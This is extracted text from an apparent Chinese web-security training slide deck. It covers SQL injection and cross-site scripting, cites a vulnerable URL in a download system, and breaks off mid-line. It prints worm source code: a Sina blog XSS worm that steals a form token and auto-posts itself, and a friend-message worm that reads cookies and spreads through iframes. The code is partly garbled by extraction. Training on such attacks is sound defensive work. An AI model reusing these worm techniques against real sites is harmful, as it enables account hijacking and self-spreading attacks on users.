WEB安全培训PPT.pptVIP

内容简介 1. 知己知彼,百战不殆 2. 解析黑客手中的利器 3. 捍卫代码城堡 4. 剑走偏锋 5. 惊栗后的深思 6. 双剑合壁; ;脚本安全编程重要性; ;WEB攻击流程;黑客攻击技术曝光; SQL注入利用的是参数传递的时候过滤不严时用参数组合成正确的SQL语句来执行操作的技术。 简单的理解为：涉及进入SQL语句操作的变量没有过滤输入与转义输出 实例-夜猫软件下载系统(攻击与修复) 8/ymdown/show.php?id=1;黑客攻击技术曝光; XSS又叫CSS (Cross Site Script) ，跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码(恶意JS代码)，当用户浏览该页之时，嵌入其中Web里面的html代码(恶意JS代码)会被执行，从而达到恶意用户的特殊目的。 输入一些数据需要在页面中显示出来，但是没有对这段数据做过滤输入或者转义输出。;xss特点 继承浏览器权限 社会工程，被动攻击 影响广泛(只要浏览器支持JavaScript) 隐蔽，难以察觉 XSS可能出现在哪？ 1. HTML标签外部 2. HTML标签内部(属性、事件) 3. 输入到javascript代码 ; ;百度XSS蠕虫攻击统计 ;新浪博客 v5.0 蠕虫 var blogtitle = I OwNed youR BloG var blogbody = You\rE mY fOOd.bra href=\\蠕虫传播主体,不要构造这里/a var xmlhttp = new ActiveXObject(Msxml2.XMLHTTP.3.0); xmlhttp.open(GET,/admin/article/article_add.php,false); xmlhttp.send(); var xss = xmlhttp.responseText; token=xss.indexOf(vtoken); if(token0) { vtoken=xss.substr(token+15,32); xmlhttp.open(post,/admin/article/article_post.php,false); xmlhttp.setRequestHeader(Content-Type,application/x-www-form-urlencoded); xmlhttp.send(album=blog_id=is_album=0stag=sno=channel_id=url=channel=newsid=book_worksid=vtoken=+vtoken+is_media=0blog_title=+blogtitle+blog_body=+blogbody+tag=blog_class=0x_cms_flag=1sina_sort_id=117is2bbs=1join_circle=1); var suss = xmlhttp.responseText; send=suss.indexOf(06001); if(send0) { //alert(感染成功 : )); document.location = /; } else { alert(感染失败 : (); } };新浪空间 好友纸条群发蠕虫 获取cookie中的uid cookie=unescape(request(cookie)) cflag=Instr(cookie,nick=) dflag=Instr(cookie,);) …………………省略…………………….. 遍历好友数 for i = 1 to 500 得到此uid的好友 url=/friend/list.php?uid= uid page= i pagesize=1 xml.open GET,url,False xml.send htmlcon=b2bstr(xml.responsebody) 提取好友uid aflag=Instr(htmlcon,{record:[{uid:) bflag=InStr(htmlcon,,ftype) If aflag 0 And bflag 0 Then okflag=Replace(Replace(mid(htmlcon,aflag,bflag),{record:[{uid:,),,) Else 超过最大好友数就中断 exit for End If playload Response.Write iframe src=message.asp?uid= okflag width=700 height=30“ fra